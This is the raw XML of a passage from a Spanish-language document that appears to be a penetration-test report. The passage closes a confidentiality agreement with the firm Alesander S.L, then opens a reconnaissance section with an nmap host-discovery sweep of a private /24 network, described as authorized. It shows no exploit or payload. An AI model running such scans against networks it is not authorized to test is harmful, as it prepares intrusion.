              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2347EED2" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19A1C103" w14:textId="099E5D5E" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Sea explícitamente identificada, de conformidad con este compromiso, como información no confidencial</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D7657F2" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7018C02B" w14:textId="219FC6E7" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Cuya comunicación o uso sin restricciones haya sido aprobada por la empresa cliente</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00912923" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BE3CC66" w14:textId="7C81FBA4" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Sea independientemente generada por Alesander S.L sin hacer uso de información confidencial</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D255719" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C8B2A8E" w14:textId="6A34893E" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Haya sido requerida por la parte receptora mediante una resolución firme por autoridades administrativas o judiciales competentes. En este caso deberá notificarse</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDC8F4B" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36B02733" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="006FC800" w14:textId="1422870C" w:rsidR="00E65638" w:rsidRPr="00010ADE" w:rsidRDefault="00E65638" w:rsidP="00010ADE"/>
          <w:p w14:paraId="473948DA" w14:textId="6B5F762E" w:rsidR="00E65638" w:rsidRPr="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00010ADE">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Derechos de propiedad:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546F663B" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D3A5398" w14:textId="0EC3021B" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>En este acuerdo no supone la concesión expresa o implícita, de derecho alguno sobre la información confidencial que la empresa cliente suministre, salvo el que en cada caso sea otorgado expresamente en relación con el alcance del presente contrato.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A5C25D" w14:textId="54BA6BB6" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:t xml:space="preserve">En consecuencia, el suministro de dicha información no podrá entenderse, en ningún caso, como concesión de patente, licencia o cualquier otro derecho de propiedad intelectual o industrial alguno, considerándose que aquella permanecerá en todo momento en el ámbito de propiedad de la empresa cliente o del tercero a quien pertenezca. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45AA3183" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRPr="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="504C59E2" w14:textId="5D2D87D8" w:rsidR="00537D72" w:rsidRPr="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00010ADE">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Vigencia</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63FDB839" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="250CFA3C" w14:textId="1D9EC5CC" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:t>Las obligaciones previstas en la cláusula 2 permanecerán en vigor hasta que hayan transcurrido tres años contados a partir de la fecha de entrega del informe de resultados del presente contrato.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD0A085" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE"/>
          <w:p w14:paraId="19BF53EF" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00010ADE"/>
          <w:p w14:paraId="64E37DD2" w14:textId="6B3BA3FB" w:rsidR="00010ADE" w:rsidRPr="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00010ADE">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Legislación aplicable:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29BEF565" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74B79131" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:t>Este compromiso se interpretará de conformidad con las leyes españolas, en este caso la ley de protección de datos del 2018.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4149FFC2" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:t>La ley aplicable a nivel europeo será el Reglamento General de Protección de Datos (RGPD), de 25 mayo de 2018.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C39852" w14:textId="3DF904CA" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:t>Además, la Ley Orgánica 3/2018, de 5 de diciembre, de Protección de Datos Personales y garantía de los derechos digitales, que desarrolla el RGPD y establece las bases legales para la protección de datos personales en territorio español.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21B737E4" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:r>
              <w:t>Si alguna de las partes es objeto de una fusión u otro tipo de reorganización societaria, se acuerda que este compromiso será vinculante para que el suceda de acuerdo con el lay aplicable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C64884B" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE"/>
          <w:p w14:paraId="159B65F5" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00010ADE"/>
          <w:p w14:paraId="41F8BC02" w14:textId="53CD4834" w:rsidR="00010ADE" w:rsidRPr="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00010ADE">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Clausula penal:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6CB8EC" w14:textId="77777777" w:rsidR="00010ADE" w:rsidRDefault="00010ADE" w:rsidP="00010ADE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FB9F772" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Las partes se comprometen a cumplir con todos los términos fijados en el presente contrato, y muy especialmente aquellos relativos a las cláusulas sobre propiedad intelectual e industrial, confidencialidad y obligación de secreto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C56C72E" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
            </w:pPr>
            <w:r>
              <w:t>Independientemente de las responsabilidades que pudieran derivarse del incumplimiento del presente acuerdo, así como de las eventuales indemnizaciones por daños y perjuicios de cualquier naturaleza que pudieran establecerse, el incumplimiento de estas obligaciones determinará a elección de la parte que no incumplió el contenido de los términos fijados en el presente contrato:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4823DF71" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>La resolución del contrato.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="233FC094" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">El abono de…………. € en concepto de penalización. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C3CDC8C" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00010ADE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="473B3EF3" w14:textId="161A29CC" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C0870">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Confidencialidad del acuerdo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D3DB3A" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7123B04D" w14:textId="0117CC73" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Las partes acuerdan que este acuerdo reviste el carácter de confidencial y por tanto se prohíbe su divulgación a terceros.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08AD036D" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D85C90E" w14:textId="1F2A90C4" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Modificación o cancelación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107F94BA" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3201D915" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
            </w:pPr>
            <w:r>
              <w:t>Este acuerdo sólo podrá ser modificado con el consentimiento expreso de ambas partes, en documento escrito y mencionando la voluntad de las partes de modificar el presente acuerdo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="475925D1" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="367FA9BC" w14:textId="31901DA5" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Jurisdicción:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA0886E" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1440"/>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5429180E" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
            </w:pPr>
            <w:r>
              <w:t>Las partes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>se comprometen a resolver de manera amistosa cualquier desacuerdo que pueda surgir en el desarrollo del presente contrato.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478CB5B7" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
            </w:pPr>
            <w:r>
              <w:t>En caso de conflicto ambas partes acuerdan el sometimiento a los Tribunales de……….., con renuncia de su propio fuero.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C240525" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
            </w:pPr>
            <w:r>
              <w:t>Y en prueba de conformidad de cuanto antecede, firman el presente acuerdo por duplicado y a un solo efecto en el lugar y fecha citados.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8721D0" w14:textId="77777777" w:rsidR="003C0870" w:rsidRPr="003C0870" w:rsidRDefault="003C0870" w:rsidP="003C0870">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49AD6CE1" w14:textId="77777777" w:rsidR="00E115A4" w:rsidRDefault="00E115A4" w:rsidP="00E115A4"/>
          <w:p w14:paraId="276455E5" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00E115A4"/>
          <w:p w14:paraId="64853E52" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00E115A4"/>
          <w:p w14:paraId="3FDBA91F" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00E115A4"/>
          <w:p w14:paraId="6E0CDBED" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00E115A4"/>
          <w:p w14:paraId="79D245D2" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00E115A4"/>
          <w:p w14:paraId="70B08912" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="00E115A4"/>
          <w:p w14:paraId="58BBEC7B" w14:textId="77777777" w:rsidR="00E115A4" w:rsidRPr="00E115A4" w:rsidRDefault="00E115A4" w:rsidP="00E115A4"/>
          <w:p w14:paraId="3A7560E3" w14:textId="333A66FD" w:rsidR="00A54FDA" w:rsidRDefault="00507D29" w:rsidP="00A54FDA">
            <w:pPr>
              <w:pStyle w:val="Ttulo1"/>
            </w:pPr>
            <w:bookmarkStart w:id="19" w:name="_Toc135575976"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00A54FDA">
              <w:t>Recopilación de información</w:t>
            </w:r>
            <w:bookmarkEnd w:id="19"/>
          </w:p>
          <w:p w14:paraId="1DE4EA78" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12D7EF46" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DE753DD" w14:textId="366D4914" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="20" w:name="_Toc135575977"/>
            <w:r>
              <w:t>Escaneo de la red:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="20"/>
          </w:p>
          <w:p w14:paraId="4E566215" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35D5C3B0" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EA788B6" w14:textId="0E67DF2C" w:rsidR="00A54FDA" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Para realizar el escaneo general de la red voy zenmap en Windows.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3458064C" w14:textId="77777777" w:rsidR="006033E0" w:rsidRDefault="006033E0" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F8DD705" w14:textId="77777777" w:rsidR="006033E0" w:rsidRDefault="006033E0" w:rsidP="006033E0">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>En este caso tendremos que detectar las tres máquinas de la red a las cuales tenemos permiso para realizar el pentesting, que estas son un dos Windows server 2019 y un Windows 20H2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0F3B11" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24DAFCCF" w14:textId="6891D905" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Usaré el siguiente comando:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB874F2" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62A17EFF" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A024920" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="756D5E18" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76CA9AFC" w14:textId="77777777" w:rsidR="00A54FDA" w:rsidRDefault="00A54FDA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="406EC53E" w14:textId="3F4662E1" w:rsidR="00A54FDA" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A4C18D9" wp14:editId="2461FEC5">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:align>center</wp:align>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>182880</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2360930" cy="1404620"/>
                      <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="1257660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3E3F9398" w14:textId="78F56B8D" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                                  <w:r w:rsidRPr="00BE1898">
                                    <w:t>nmap -T</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t>5</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00BE1898">
                                    <w:t xml:space="preserve">  -v </w:t>
                                  </w:r>
                                  <w:r w:rsidR="0033590D">
                                    <w:t xml:space="preserve">-sn </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00BE1898">
                                    <w:t>192.168.1.0/24</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4D2A3BD4" w14:textId="5DEFFFA5" w:rsidR="00BE1898" w:rsidRDefault="00BE1898">
                                  <w:r>
                                    <w:t xml:space="preserve">T5 lo que hace es haga escaneos muy rápidos con los cuales </w:t>
                                  </w:r>
                                  <w:r w:rsidR="0033590D">
                                    <w:t>sería</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t xml:space="preserve"> muy fácil que nos detectaran.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="25F3B217" w14:textId="4A7C8A6B" w:rsidR="0033590D" w:rsidRDefault="0033590D">
                                  <w:r>
                                    <w:t>-sn sería un barrido de host sin escaneo de puertos.</w:t>
                                  </w:r>
                                </w:p>
